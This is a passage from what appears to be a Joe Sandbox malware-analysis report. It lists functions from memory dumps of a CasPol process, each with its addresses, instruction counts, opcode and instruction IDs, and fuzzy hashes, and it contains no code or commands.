                                                                                                                                    • Opcode ID: d8999b97fe7b4dfb97373d910d364c4e7dbd2c6ad624b90179636722941950df
                                                                                                                                    • Instruction ID: 1702c0e836e73aff7c53791e97e5ef47b66421f0f1b44144662a43a6b83702bc
                                                                                                                                    • Opcode Fuzzy Hash: d8999b97fe7b4dfb97373d910d364c4e7dbd2c6ad624b90179636722941950df
                                                                                                                                    • Instruction Fuzzy Hash: 2251D375B093868FDB42C77898943EE3FF19F96204F0584EAD449DB293EB389805C765
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51A88 Relevance: .2, Instructions: 169COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6a5a22586f26703a5422155e07c57b6077f2611d8d0302eed7bba7aeaf3e53a8
                                                                                                                                    • Instruction ID: c7cfdf755aff68fff83f78f1cbe51d1f1312a547272031db772790d1bd5ddf29
                                                                                                                                    • Opcode Fuzzy Hash: 6a5a22586f26703a5422155e07c57b6077f2611d8d0302eed7bba7aeaf3e53a8
                                                                                                                                    • Instruction Fuzzy Hash: D2513E75B002148FCB55EFBDC89869EBBF2AF88340B249529D406EB351DF35EC428B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53618 Relevance: .2, Instructions: 167COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c8e43dcdccd2d9d29aaddfab59cb1c40a18408454ee01a91de1b1fb231cdd807
                                                                                                                                    • Instruction ID: d296f6e2c94720ff0594727de948a84fd65389dd1fcfc1dd6e75368c8eeb1a4b
                                                                                                                                    • Opcode Fuzzy Hash: c8e43dcdccd2d9d29aaddfab59cb1c40a18408454ee01a91de1b1fb231cdd807
                                                                                                                                    • Instruction Fuzzy Hash: C2814974A15219DFDBA1DF68C8486A8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5366F Relevance: .2, Instructions: 157COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c38d901732167aed5fe9f213daf7c1c23a1bc4419c480261d8ad439a49295b3
                                                                                                                                    • Instruction ID: b452e7f2fa2a36479de7076787813f1fa89d9bcdcc7e665ae4ecf09e2801571e
                                                                                                                                    • Opcode Fuzzy Hash: 7c38d901732167aed5fe9f213daf7c1c23a1bc4419c480261d8ad439a49295b3
                                                                                                                                    • Instruction Fuzzy Hash: 38814974A15219DFDBA1DF68CC48AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC57538 Relevance: .2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3f31271cf43eb8d8a2e4a218a1bad9ce6939b61b119ff796cdf47792273f48c2
                                                                                                                                    • Instruction ID: 1551da8b48db88b12e2ec319105a7d9cfa13a5e38bf34db2ea40444df6393bfd
                                                                                                                                    • Opcode Fuzzy Hash: 3f31271cf43eb8d8a2e4a218a1bad9ce6939b61b119ff796cdf47792273f48c2
                                                                                                                                    • Instruction Fuzzy Hash: 22518C35B00718CFCB45EBB8D88469DBBF6AF88350B248529D406EB350DF35AD829B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065E0D1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a2d9431deab7a1cfe0ffb3a3347b982c9180bf3280c1d51e284f2a2272c3b5e0
                                                                                                                                    • Instruction ID: e76dcdfee9bbdc9749effb19eea51532241dff52f40363e2709c593cb8ecc702
                                                                                                                                    • Opcode Fuzzy Hash: a2d9431deab7a1cfe0ffb3a3347b982c9180bf3280c1d51e284f2a2272c3b5e0
                                                                                                                                    • Instruction Fuzzy Hash: D8514974F043588FDF15DBB9C89869E7FF2AF89304F1084A9D50AEB281EB349945CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC58130 Relevance: .2, Instructions: 151COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 38e2c6e7c1f7d4788c497a5d4bc730d48fbbef8ab074840a1e7d4686e95dffd2
                                                                                                                                    • Instruction ID: 54e66d251ed1f1f95cd42ad5fedce1a119c177443fd827dc365ad6cae924a15c
                                                                                                                                    • Opcode Fuzzy Hash: 38e2c6e7c1f7d4788c497a5d4bc730d48fbbef8ab074840a1e7d4686e95dffd2
                                                                                                                                    • Instruction Fuzzy Hash: C551BE70B006558FDB01DB78C89066EBBF2AF84310F598169D54ADB391EB30EC42DB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC536C6 Relevance: .1, Instructions: 147COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93e75efd199d9853b287804263975b59da9c61a9e6c44f149f8f4899706753dd
                                                                                                                                    • Instruction ID: 46b6b6b58b9479b0b4482769e1d6490e3b7086767068e9acdcec071147366668
                                                                                                                                    • Opcode Fuzzy Hash: 93e75efd199d9853b287804263975b59da9c61a9e6c44f149f8f4899706753dd
                                                                                                                                    • Instruction Fuzzy Hash: EC713874A15229DFDBA1DF68CC48AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065440F Relevance: .1, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 374f84e6c3200d9db29b1ce3c66148dcaa67fb8c503800005e4f8f6f3d15747f
                                                                                                                                    • Instruction ID: 96bf9134b76040e863695266c9bb52d0ea58171d8c1305b871d3c3c2dd23054b
                                                                                                                                    • Opcode Fuzzy Hash: 374f84e6c3200d9db29b1ce3c66148dcaa67fb8c503800005e4f8f6f3d15747f
                                                                                                                                    • Instruction Fuzzy Hash: 0B51DA30E082409BDB24C7B8C890B5EBEE29F86318F24859DD21BBBFC5D675AC548761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC512D0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2ed51d64aa9c2ce8821d57108d2a0b2210826e340f57b34687cc861a22a7fcc7
                                                                                                                                    • Instruction ID: e45883a3653059422540934b01cb86ecbd06ca60675f3b3db19ad815a6b138c4
                                                                                                                                    • Opcode Fuzzy Hash: 2ed51d64aa9c2ce8821d57108d2a0b2210826e340f57b34687cc861a22a7fcc7
                                                                                                                                    • Instruction Fuzzy Hash: 0941D034B002158FD71AAB7C885426E7FE7ABC9305F91446DC402DB3A3DF259E078B9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5371D Relevance: .1, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 344e6285485b768eb653ea535847a5831fcfad092e9c29680e793e0af4c8aff3
                                                                                                                                    • Instruction ID: edd6de86300386a58a96da3bf16859f3a9167a573a4ccdf3eb4a4efc57faf7e1
                                                                                                                                    • Opcode Fuzzy Hash: 344e6285485b768eb653ea535847a5831fcfad092e9c29680e793e0af4c8aff3
                                                                                                                                    • Instruction Fuzzy Hash: 51614874A15219DFDBA2DB68C8486A8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59B38 Relevance: .1, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d610ecb623541ae4d9f549b5dde3ef0d46a35bfee5a101ae959ad997b1d3ee6
                                                                                                                                    • Instruction ID: d62d60d27c52e30bd2d1f4a92dfd6b145cdfa4a356e9713c953920ffea456188
                                                                                                                                    • Opcode Fuzzy Hash: 9d610ecb623541ae4d9f549b5dde3ef0d46a35bfee5a101ae959ad997b1d3ee6
                                                                                                                                    • Instruction Fuzzy Hash: 2A414A71F007288FCB54EFB8C49869EBBFAAF8C241B104429E506D7344EF38A905CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC55281 Relevance: .1, Instructions: 134COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8981bef0061c2e392e3e435debc6f83906a157f9ac0686b6f291a80d176ffc6
                                                                                                                                    • Instruction ID: d343e3e216c30e064cee88b9161e3574c99abd60ada2679a09eaaf9e48d8bd8e
                                                                                                                                    • Opcode Fuzzy Hash: a8981bef0061c2e392e3e435debc6f83906a157f9ac0686b6f291a80d176ffc6
                                                                                                                                    • Instruction Fuzzy Hash: 9E4106B5B183828FE3019B74DC557DA3BA19BC9304F2584BAD24CCB392EB749C058BA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC57758 Relevance: .1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2b439652bacaa13c52a5e0ed597c5b76db17014b00f74587f1a1791e82a2f73
                                                                                                                                    • Instruction ID: d313db9bb8d89721d75a5d91dd056548d2f80d196e11bacc00262b6e64ab335c
                                                                                                                                    • Opcode Fuzzy Hash: f2b439652bacaa13c52a5e0ed597c5b76db17014b00f74587f1a1791e82a2f73
                                                                                                                                    • Instruction Fuzzy Hash: FD41AE31F043558FCB55ABB8889479E7FF2AF89340B11447AD50ADB391EE388D06CB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20656024 Relevance: .1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ad2beb8f3dc1a166fb1fb255da63c41391714cc1c6c4f02f8d521c5464fa4dd
                                                                                                                                    • Instruction ID: c585f25bbe639020f1a20146a8e40149afc3409d1f0e923d878465190f40b546
                                                                                                                                    • Opcode Fuzzy Hash: 6ad2beb8f3dc1a166fb1fb255da63c41391714cc1c6c4f02f8d521c5464fa4dd
                                                                                                                                    • Instruction Fuzzy Hash: 72515F74E053249FDB64DBB98854B9DBBB1AF88300F1584EAD509EB290DA309D44CF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53774 Relevance: .1, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6197cc600b7e9cd73de26a57164e76181c79e03c30b4d2601718ed6f9e74c845
                                                                                                                                    • Instruction ID: d5fc86127bfd343e5e47ea8a9b60dad4925c03b7980fecbf8b708e378ad241e3
                                                                                                                                    • Opcode Fuzzy Hash: 6197cc600b7e9cd73de26a57164e76181c79e03c30b4d2601718ed6f9e74c845
                                                                                                                                    • Instruction Fuzzy Hash: 37515874A152299FDBA1DB68C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065F8D0 Relevance: .1, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b40f32e19344a4058aec52cf19cc4b21443745dcfa5bb7c41a3a907f688a7c76
                                                                                                                                    • Instruction ID: 0f0e699d83700dbaa97be8e33f9c64bffb833f88a533ba7ecbd8b4a4e63f8c5b
                                                                                                                                    • Opcode Fuzzy Hash: b40f32e19344a4058aec52cf19cc4b21443745dcfa5bb7c41a3a907f688a7c76
                                                                                                                                    • Instruction Fuzzy Hash: 3F419878B043558FC742D7B8C85569E7FF19F8A600B1580A6D148DB3A2EB349D0ACBA3
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC537BF Relevance: .1, Instructions: 117COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d6c13e1400742dee3960cd181836eafc54b6c6d6b71e79a4071eb84c0f44b44b
                                                                                                                                    • Instruction ID: e1c8cfb924960462b4bc41e5c825cb3fad2b116a9323c8b7c87bca9010b95c3a
                                                                                                                                    • Opcode Fuzzy Hash: d6c13e1400742dee3960cd181836eafc54b6c6d6b71e79a4071eb84c0f44b44b
                                                                                                                                    • Instruction Fuzzy Hash: F5516774A152299FDBA1DF68C848AA8BBF6FF48310F1091DA985DA7320DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC561A1 Relevance: .1, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: afc16c65ba2c065c7bb002cb3d023050dcf5ae1e0cd661f2d36da7fc903264e8
                                                                                                                                    • Instruction ID: ba3dc2fa905de374450ee971452d25f616ff167714d51589573228cb13a7a8e1
                                                                                                                                    • Opcode Fuzzy Hash: afc16c65ba2c065c7bb002cb3d023050dcf5ae1e0cd661f2d36da7fc903264e8
                                                                                                                                    • Instruction Fuzzy Hash: 88415A71B00315CFCB589B78C4A46AEBBF2AFC8350B258829D446DB350DF35E842DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC561B0 Relevance: .1, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d8ca414799a91ebce4f07c9590d2101ca015c9b60bfa3beedc505950dcac3143
                                                                                                                                    • Instruction ID: 4dbfbdb08d9a9c773a4f2cb29901d386ec4ef833cc6dc69a7f87571092f1e982
                                                                                                                                    • Opcode Fuzzy Hash: d8ca414799a91ebce4f07c9590d2101ca015c9b60bfa3beedc505950dcac3143
                                                                                                                                    • Instruction Fuzzy Hash: 28416971B00214CFCB549B7884A47AEBBF2AFC8350B258829D446D7364EE35EC02DB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658AF8 Relevance: .1, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce80ca1b4bc7e7c6d34238b387bb1c935835ae71508144c4c48616efeae37f27
                                                                                                                                    • Instruction ID: 7ece68fa9e2661bc3895b241fd13137118afaa77b5a8a4f64b53e70592f5a41f
                                                                                                                                    • Opcode Fuzzy Hash: ce80ca1b4bc7e7c6d34238b387bb1c935835ae71508144c4c48616efeae37f27
                                                                                                                                    • Instruction Fuzzy Hash: AE310C74B053448FC741D7B8885569E7FF19F8A300B1580A6D108EB752EF349D06CBA6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653C60 Relevance: .1, Instructions: 108COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dea2b25509e75b617a595630cb60fe8bca17f751d0abc37bc1508bd656630943
                                                                                                                                    • Instruction ID: c4e0098328d94685eea5b4e54252952c8ea5c8b421325a4e07bfc93abcb27b44
                                                                                                                                    • Opcode Fuzzy Hash: dea2b25509e75b617a595630cb60fe8bca17f751d0abc37bc1508bd656630943
                                                                                                                                    • Instruction Fuzzy Hash: F2316E31B10234DBCB54ABB8D8A47AE7BF2BF88644F254539D506E7394EE358C06CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53816 Relevance: .1, Instructions: 107COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9b5ddc49104a1996f843d4a1a1eac98d6bfbe89eec26b2f9552c1ae1b1a0d188
                                                                                                                                    • Instruction ID: 8cd27f556589416d835872610cdd664f10dda7c668f4854d0385ba92b5964213
                                                                                                                                    • Opcode Fuzzy Hash: 9b5ddc49104a1996f843d4a1a1eac98d6bfbe89eec26b2f9552c1ae1b1a0d188
                                                                                                                                    • Instruction Fuzzy Hash: 5F516774A15229DFDBA1DF68C848AA8BBF6FB49310F1091DA985DA7320DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50CAC Relevance: .1, Instructions: 106COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 81551bfdb45c48595b2fbcb5d544d26c0201bd1ce2c74a2184fce2c40aeb8b94
                                                                                                                                    • Instruction ID: cd1112dc260a80d17bbf3ea0f645319607629009a173832a585bb0b00a7fdffc
                                                                                                                                    • Opcode Fuzzy Hash: 81551bfdb45c48595b2fbcb5d544d26c0201bd1ce2c74a2184fce2c40aeb8b94
                                                                                                                                    • Instruction Fuzzy Hash: 6C319035B00217CFCB08ABB8C9506DDBBF2AF49214B104979C445EB3A0EF35AC42CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065860F Relevance: .1, Instructions: 106COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 07cfa7f4db36fd35bcbbb8aafe4a05921052e3d3f89c74dc7765987b182d225f
                                                                                                                                    • Instruction ID: 9138089c0fa43b5067f93760f872c9c4ea8912bbc69573142e5b5579914b2c91
                                                                                                                                    • Opcode Fuzzy Hash: 07cfa7f4db36fd35bcbbb8aafe4a05921052e3d3f89c74dc7765987b182d225f
                                                                                                                                    • Instruction Fuzzy Hash: 163174747013465FFB10CBA8C880B9B7BA6EF86704F540469E442FB795E730ED058B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50006 Relevance: .1, Instructions: 102COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e292efdc8c34787d22f82f825a8bc8468d3c52f1ac043136a6dfb33e4ac4c48e
                                                                                                                                    • Instruction ID: 283a9332f37cb866aa91f036c47d4562b723fb9495a50624977dea487ae19619
                                                                                                                                    • Opcode Fuzzy Hash: e292efdc8c34787d22f82f825a8bc8468d3c52f1ac043136a6dfb33e4ac4c48e
                                                                                                                                    • Instruction Fuzzy Hash: 7A31E471A0A391CFCB129FB8C99129CBFB0AF06310B1541EBC458DB1A3E7355C16DBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC50AB0 Relevance: .1, Instructions: 100COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
